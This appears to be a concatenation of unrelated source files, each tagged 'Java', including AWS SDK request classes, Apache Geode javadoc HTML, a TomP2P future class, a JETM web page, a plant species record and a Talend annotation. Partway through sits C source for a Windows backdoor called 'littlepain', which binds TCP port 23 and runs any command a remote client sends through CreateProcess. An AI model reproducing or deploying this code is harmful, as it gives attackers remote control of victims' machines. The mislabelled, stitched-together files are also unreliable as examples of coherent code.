a Crawler</a>. * </p> * * @return Crawler configuration information. This versioned JSON string allows users to specify aspects of a * crawler's behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. */ public String getConfiguration() { return this.configuration; } /** * <p> * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's * behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. * </p> * * @param configuration * Crawler configuration information. This versioned JSON string allows users to specify aspects of a * crawler's behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withConfiguration(String configuration) { setConfiguration(configuration); return this; } /** * <p> * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * </p> * * @param crawlerSecurityConfiguration * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. */ public void setCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) { this.crawlerSecurityConfiguration = crawlerSecurityConfiguration; } /** * <p> * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * </p> * * @return The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. */ public String getCrawlerSecurityConfiguration() { return this.crawlerSecurityConfiguration; } /** * <p> * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * </p> * * @param crawlerSecurityConfiguration * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) { setCrawlerSecurityConfiguration(crawlerSecurityConfiguration); return this; } /** * <p> * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information * about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web * Services Tags in Glue</a> in the developer guide. * </p> * * @return The tags to use with this crawler request. You may use tags to limit access to the crawler. For more * information about tags in Glue, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a> * in the developer guide. */ public java.util.Map<String, String> getTags() { return tags; } /** * <p> * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information * about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web * Services Tags in Glue</a> in the developer guide. * </p> * * @param tags * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more * information about tags in Glue, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a> * in the developer guide. */ public void setTags(java.util.Map<String, String> tags) { this.tags = tags; } /** * <p> * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information * about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web * Services Tags in Glue</a> in the developer guide. * </p> * * @param tags * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more * information about tags in Glue, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a> * in the developer guide. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withTags(java.util.Map<String, String> tags) { setTags(tags); return this; } /** * Add a single Tags entry * * @see CreateCrawlerRequest#withTags * @returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest addTagsEntry(String key, String value) { if (null == this.tags) { this.tags = new java.util.HashMap<String, String>(); } if (this.tags.containsKey(key)) throw new IllegalArgumentException("Duplicated keys (" + key.toString() + ") are provided."); this.tags.put(key, value); return this; } /** * Removes all the entries added into Tags. * * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest clearTagsEntries() { this.tags = null; return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getName() != null) sb.append("Name: ").append(getName()).append(","); if (getRole() != null) sb.append("Role: ").append(getRole()).append(","); if (getDatabaseName() != null) sb.append("DatabaseName: ").append(getDatabaseName()).append(","); if (getDescription() != null) sb.append("Description: ").append(getDescription()).append(","); if (getTargets() != null) sb.append("Targets: ").append(getTargets()).append(","); if (getSchedule() != null) sb.append("Schedule: ").append(getSchedule()).append(","); if (getClassifiers() != null) sb.append("Classifiers: ").append(getClassifiers()).append(","); if (getTablePrefix() != null) sb.append("TablePrefix: ").append(getTablePrefix()).append(","); if (getSchemaChangePolicy() != null) sb.append("SchemaChangePolicy: ").append(getSchemaChangePolicy()).append(","); if (getRecrawlPolicy() != null) sb.append("RecrawlPolicy: ").append(getRecrawlPolicy()).append(","); if (getLineageConfiguration() != null) sb.append("LineageConfiguration: ").append(getLineageConfiguration()).append(","); if (getLakeFormationConfiguration() != null) sb.append("LakeFormationConfiguration: ").append(getLakeFormationConfiguration()).append(","); if (getConfiguration() != null) sb.append("Configuration: ").append(getConfiguration()).append(","); if (getCrawlerSecurityConfiguration() != null) sb.append("CrawlerSecurityConfiguration: ").append(getCrawlerSecurityConfiguration()).append(","); if (getTags() != null) sb.append("Tags: ").append(getTags()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof CreateCrawlerRequest == false) return false; CreateCrawlerRequest other = (CreateCrawlerRequest) obj; if (other.getName() == null ^ this.getName() == null) return false; if (other.getName() != null && other.getName().equals(this.getName()) == false) return false; if (other.getRole() == null ^ this.getRole() == null) return false; if (other.getRole() != null && other.getRole().equals(this.getRole()) == false) return false; if (other.getDatabaseName() == null ^ this.getDatabaseName() == null) return false; if (other.getDatabaseName() != null && other.getDatabaseName().equals(this.getDatabaseName()) == false) return false; if (other.getDescription() == null ^ this.getDescription() == null) return false; if (other.getDescription() != null && other.getDescription().equals(this.getDescription()) == false) return false; if (other.getTargets() == null ^ this.getTargets() == null) return false; if (other.getTargets() != null && other.getTargets().equals(this.getTargets()) == false) return false; if (other.getSchedule() == null ^ this.getSchedule() == null) return false; if (other.getSchedule() != null && other.getSchedule().equals(this.getSchedule()) == false) return false; if (other.getClassifiers() == null ^ this.getClassifiers() == null) return false; if (other.getClassifiers() != null && other.getClassifiers().equals(this.getClassifiers()) == false) return false; if (other.getTablePrefix() == null ^ this.getTablePrefix() == null) return false; if (other.getTablePrefix() != null && other.getTablePrefix().equals(this.getTablePrefix()) == false) return false; if (other.getSchemaChangePolicy() == null ^ this.getSchemaChangePolicy() == null) return false; if (other.getSchemaChangePolicy() != null && other.getSchemaChangePolicy().equals(this.getSchemaChangePolicy()) == false) return false; if (other.getRecrawlPolicy() == null ^ this.getRecrawlPolicy() == null) return false; if (other.getRecrawlPolicy() != null && other.getRecrawlPolicy().equals(this.getRecrawlPolicy()) == false) return false; if (other.getLineageConfiguration() == null ^ this.getLineageConfiguration() == null) return false; if (other.getLineageConfiguration() != null && other.getLineageConfiguration().equals(this.getLineageConfiguration()) == false) return false; if (other.getLakeFormationConfiguration() == null ^ this.getLakeFormationConfiguration() == null) return false; if (other.getLakeFormationConfiguration() != null && other.getLakeFormationConfiguration().equals(this.getLakeFormationConfiguration()) == false) return false; if (other.getConfiguration() == null ^ this.getConfiguration() == null) return false; if (other.getConfiguration() != null && other.getConfiguration().equals(this.getConfiguration()) == false) return false; if (other.getCrawlerSecurityConfiguration() == null ^ this.getCrawlerSecurityConfiguration() == null) return false; if (other.getCrawlerSecurityConfiguration() != null && other.getCrawlerSecurityConfiguration().equals(this.getCrawlerSecurityConfiguration()) == false) return false; if (other.getTags() == null ^ this.getTags() == null) return false; if (other.getTags() != null && other.getTags().equals(this.getTags()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode()); hashCode = prime * hashCode + ((getRole() == null) ? 0 : getRole().hashCode()); hashCode = prime * hashCode + ((getDatabaseName() == null) ? 0 : getDatabaseName().hashCode()); hashCode = prime * hashCode + ((getDescription() == null) ? 0 : getDescription().hashCode()); hashCode = prime * hashCode + ((getTargets() == null) ? 0 : getTargets().hashCode()); hashCode = prime * hashCode + ((getSchedule() == null) ? 0 : getSchedule().hashCode()); hashCode = prime * hashCode + ((getClassifiers() == null) ? 0 : getClassifiers().hashCode()); hashCode = prime * hashCode + ((getTablePrefix() == null) ? 0 : getTablePrefix().hashCode()); hashCode = prime * hashCode + ((getSchemaChangePolicy() == null) ? 0 : getSchemaChangePolicy().hashCode()); hashCode = prime * hashCode + ((getRecrawlPolicy() == null) ? 0 : getRecrawlPolicy().hashCode()); hashCode = prime * hashCode + ((getLineageConfiguration() == null) ? 0 : getLineageConfiguration().hashCode()); hashCode = prime * hashCode + ((getLakeFormationConfiguration() == null) ? 0 : getLakeFormationConfiguration().hashCode()); hashCode = prime * hashCode + ((getConfiguration() == null) ? 0 : getConfiguration().hashCode()); hashCode = prime * hashCode + ((getCrawlerSecurityConfiguration() == null) ? 0 : getCrawlerSecurityConfiguration().hashCode()); hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode()); return hashCode; } @Override public CreateCrawlerRequest clone() { return (CreateCrawlerRequest) super.clone(); } }
Java
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.cloudwatch.model.transform; import javax.annotation.Generated; import com.amazonaws.SdkClientException; import com.amazonaws.Request; import com.amazonaws.DefaultRequest; import com.amazonaws.http.HttpMethodName; import com.amazonaws.services.cloudwatch.model.*; import com.amazonaws.transform.Marshaller; import com.amazonaws.util.StringUtils; /** * ListDashboardsRequest Marshaller */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ListDashboardsRequestMarshaller implements Marshaller<Request<ListDashboardsRequest>, ListDashboardsRequest> { public Request<ListDashboardsRequest> marshall(ListDashboardsRequest listDashboardsRequest) { if (listDashboardsRequest == null) { throw new SdkClientException("Invalid argument passed to marshall(...)"); } Request<ListDashboardsRequest> request = new DefaultRequest<ListDashboardsRequest>(listDashboardsRequest, "AmazonCloudWatch"); request.addParameter("Action", "ListDashboards"); request.addParameter("Version", "2010-08-01"); request.setHttpMethod(HttpMethodName.POST); if (listDashboardsRequest.getDashboardNamePrefix() != null) { request.addParameter("DashboardNamePrefix", StringUtils.fromString(listDashboardsRequest.getDashboardNamePrefix())); } if (listDashboardsRequest.getNextToken() != null) { request.addParameter("NextToken", StringUtils.fromString(listDashboardsRequest.getNextToken())); } return request; } }
Java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_66-internal) on Wed Apr 13 11:47:04 PDT 2016 --> <title>ManagementException (Apache Geode 1.0.0-incubating.M2)</title> <meta name="date" content="2016-04-13"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ManagementException (Apache Geode 1.0.0-incubating.M2)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li> <li><a href="ManagementException.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li>Method</li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">com.gemstone.gemfire.management</div> <h2 title="Class ManagementException" class="title">Class ManagementException</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Throwable</li> <li> <ul class="inheritance"> <li>java.lang.Exception</li> <li> <ul class="inheritance"> <li>java.lang.RuntimeException</li> <li> <ul class="inheritance"> <li><a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">com.gemstone.gemfire.GemFireException</a></li> <li> <ul class="inheritance"> <li>com.gemstone.gemfire.management.ManagementException</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable</dd> </dl> <dl> <dt>Direct Known Subclasses:</dt> <dd><a href="../../../../com/gemstone/gemfire/management/AlreadyRunningException.html" title="class in com.gemstone.gemfire.management">AlreadyRunningException</a></dd> </dl> <hr> <br> <pre>public class <span class="typeNameLabel">ManagementException</span> extends <a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></pre> <div class="block">A <code>ManagementException</code> is a general exception that may be thrown when any administration or monitoring operation on a GemFire component fails. Various management and monitoring exceptions are wrapped in <code>ManagementException<code>s.</div> <dl> <dt><span class="simpleTagLabel">Since:</span></dt> <dd>7.0</dd> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../serialized-form.html#com.gemstone.gemfire.management.ManagementException">Serialized Form</a></dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException--">ManagementException</a></span>()</code> <div class="block">Constructs a new exception with a <code>null</code> detail message.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-">ManagementException</a></span>(java.lang.String&nbsp;message)</code> <div class="block">Constructs a new exception with the specified detail message.</div> </td> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-java.lang.Throwable-">ManagementException</a></span>(java.lang.String&nbsp;message, java.lang.Throwable&nbsp;cause)</code> <div class="block">Constructs a new ManagementException with the specified detail message and cause.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.Throwable-">ManagementException</a></span>(java.lang.Throwable&nbsp;cause)</code> <div class="block">Constructs a new ManagementException by wrapping the specified cause.</div> </td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.com.gemstone.gemfire.GemFireException"> <!-- --> </a> <h3>Methods inherited from class&nbsp;com.gemstone.gemfire.<a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></h3> <code><a href="../../../../com/gemstone/gemfire/GemFireException.html#getRootCause--">getRootCause</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Throwable"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Throwable</h3> <code>addSuppressed, fillInStackTrace, getCause, getLocalizedMessage, getMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="ManagementException--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException()</pre> <div class="block">Constructs a new exception with a <code>null</code> detail message. The cause is not initialized, and may subsequently be initialized by a call to <code>Throwable.initCause(java.lang.Throwable)</code>.</div> </li> </ul> <a name="ManagementException-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.String&nbsp;message)</pre> <div class="block">Constructs a new exception with the specified detail message. The cause is not initialized and may subsequently be initialized by a call to <code>Throwable.initCause(java.lang.Throwable)</code>.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>message</code> - The detail message.</dd> </dl> </li> </ul> <a name="ManagementException-java.lang.String-java.lang.Throwable-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.String&nbsp;message, java.lang.Throwable&nbsp;cause)</pre> <div class="block">Constructs a new ManagementException with the specified detail message and cause. <p> Note that the detail message associated with <code>cause</code> is <i>not</i> automatically incorporated in this runtime exception's detail message.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>message</code> - The detail message.</dd> <dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is unknown.</dd> </dl> </li> </ul> <a name="ManagementException-java.lang.Throwable-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.Throwable&nbsp;cause)</pre> <div class="block">Constructs a new ManagementException by wrapping the specified cause. The detail for this exception will be null if the cause is null or cause.toString() if a cause is provided.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is unknown.</dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li> <li><a href="ManagementException.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li>Method</li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Java
/* * Copyright 2013 Thomas Bocek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package net.tomp2p.futures; /** * A generic future that can be used to set a future to complete with an attachment. * * @author Thomas Bocek * * @param <K> */ public class FutureDone<K> extends BaseFutureImpl<FutureDone<K>> { public static FutureDone<Void> SUCCESS = new FutureDone<Void>().done(); private K object; /** * Creates a new future for the shutdown operation. */ public FutureDone() { self(this); } /** * Set future as finished and notify listeners. * * @return This class */ public FutureDone<K> done() { done(null); return this; } /** * Set future as finished and notify listeners. * * @param object * An object that can be attached. * @return This class */ public FutureDone<K> done(final K object) { synchronized (lock) { if (!completedAndNotify()) { return this; } this.object = object; this.type = BaseFuture.FutureType.OK; } notifyListeners(); return this; } /** * @return The attached object */ public K object() { synchronized (lock) { return object; } } }
Java
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"/> <title>Java(TM) Execution Time Measurement Library</title> <link rel="stylesheet" type="text/css" href="default.css"/> </head> <body> <div class="menu"> <a href="index.html">Home</a> | <a href="doc.html"><b>Documentation</b></a> | <a href="faq.html">FAQ</a> | <a href="../api/index.html">JavaDoc</a> | <a href="files.html"><b>Download</b></a> | <a href="svn.html">SVN</a> | <a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a> | <a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a> </div> <div id="content"> <div id="header">Java&trade; Execution Time Measurement Library</div> <div id="subheader">Runtime performance monitoring made easy</div> <div id="main"> <h3>JETM Featureset</h3> <p> Obviously the best way to explore JETM features is looking at the <a href="http://jetm.void.fm/jetm-demo/">online demo application</a>. Nevertheless this page lists the current JETM feature set. </p> <h4>JETM Core Features</h4> <ul> <li>Declarative and programmatic performance monitoring</li> <li>Flat and nested (tree-based) recording</li> <li>Low overhead - can and <b>should</b> be used in production</li> <li>Pluggable result visualization including HTML, Swing and Standard Out</li> <li>Simple setup and integration</li> <li>No VM level instrumentation requirement, JETM can and should be used per deployment unit</li> <li>Persistent performance results</li> </ul> <h4>Supported JDKs (tested, but not limited to)</h4> <ul> <li>Sun JDK 1.3, 1.4, 5.0, 6.0</li> <li>Bea JRockit</li> </ul> <h4>Supported timers</h4> <ul> <li>java.lang.System#nanoTime</li> <li>sun.misc.Perf</li> <li>java.lang.System#currentTimeMillis()</li> </ul> <h4>Framework integrations</h4> <ul> <li>Declarative performance monitoring using <a href="howto/spring_integration.html">Springframework</a> AOP, <a href="howto/aspectwerkz_integration.html">AspectWerkz</a> and other AOP Alliance Frameworks </li> <li>Build-in <a href="howto/drop-in-console.html">HTTP Server</a> for performance monitoring</li> <li>Raw Data Logging using <a href="http://logging.apache.org/log4j">Log4J</a>, <a href="http://jakarta.apache.org/commons/logging/">commons-logging</a> and <i>java.util.logging</i></li> <li>Result visualization using <a href="http://rrd4j.dev.java.net/">RRD4j</a></li> <li>Simple JMX Integration</li> </ul> </div> </div> <div class="menu"> <a href="index.html">Home</a> | <a href="doc.html"><b>Documentation</b></a> | <a href="faq.html">FAQ</a> | <a href="../api/index.html">JavaDoc</a> | <a href="files.html"><b>Download</b></a> | <a href="svn.html">SVN</a> | <a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a> | <a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a> </div> </body> <!-- Last modified $Date: 2007-07-08 23:23:02 +0200 (So, 08 Jul 2007) $ --> </html>
Java
# Manglietia dolichogyna Dandy ex Noot. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
#include "littlepain.h" /* the backdoor :) */ DWORD WINAPI BackDoor(LPVOID Data) { SOCKET server_sock,client_sock; struct sockaddr_in serv_inf; struct timeval tv; fd_set ft; char exec[MAX_PATH]; DWORD cnt; STARTUPINFO inf_prog; PROCESS_INFORMATION info_pr; if((server_sock = socket(AF_INET,SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { return 0; } serv_inf.sin_family = AF_INET; serv_inf.sin_addr.s_addr = htonl(INADDR_ANY); serv_inf.sin_port = htons(23); if(bind(server_sock,(struct sockaddr *)&serv_inf, sizeof(struct sockaddr_in)) == SOCKET_ERROR) { return 0; } listen(server_sock,SOMAXCONN); /* main loop! */ while(1) { client_sock = accept(server_sock,NULL,0); tv.tv_usec = 0; tv.tv_sec = 60; FD_ZERO(&ft); FD_SET(client_sock,&ft); /* send a msg */ send(client_sock,"[:: littlepain ::] by WarGame\r\n",31,0); while(1) { if(select(client_sock+1,&ft,NULL,NULL,&tv) > 0) { memset(exec,0,MAX_PATH); recv(client_sock,exec,MAX_PATH,0); /* remove "\r" and "\n" */ for(cnt = 0;cnt < strlen(exec);cnt++) { if(exec[cnt] == '\r' || exec[cnt] == '\n') { exec[cnt] = 0; } } /* (try to) execute the command */ memset(&inf_prog,0,sizeof(STARTUPINFO)); memset(&info_pr,0,sizeof(PROCESS_INFORMATION)); inf_prog.cb = sizeof(STARTUPINFO); inf_prog.dwFlags = STARTF_USESHOWWINDOW; inf_prog.wShowWindow = SW_SHOW; if(CreateProcess(NULL,exec,NULL,NULL,FALSE,CREATE_NEW_CONSOLE, NULL,NULL,&inf_prog,&info_pr)) { send(client_sock,"Executed!\r\n",11,0); } else { send(client_sock,"Not Executed!\r\n",15,0); } } else { closesocket(client_sock); break; } } } }
Java
/** * Copyright (C) 2006-2020 Talend Inc. - www.talend.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.talend.sdk.component.api.configuration.constraint; import static java.lang.annotation.ElementType.FIELD; import static java.lang.annotation.ElementType.PARAMETER; import static java.lang.annotation.RetentionPolicy.RUNTIME; import java.lang.annotation.Retention; import java.lang.annotation.Target; import java.util.Collection; import org.talend.sdk.component.api.configuration.constraint.meta.Validation; import org.talend.sdk.component.api.meta.Documentation; @Validation(expectedTypes = Collection.class, name = "uniqueItems") @Target({ FIELD, PARAMETER }) @Retention(RUNTIME) @Documentation("Ensure the elements of the collection must be distinct (kind of set).") public @interface Uniques { }
Java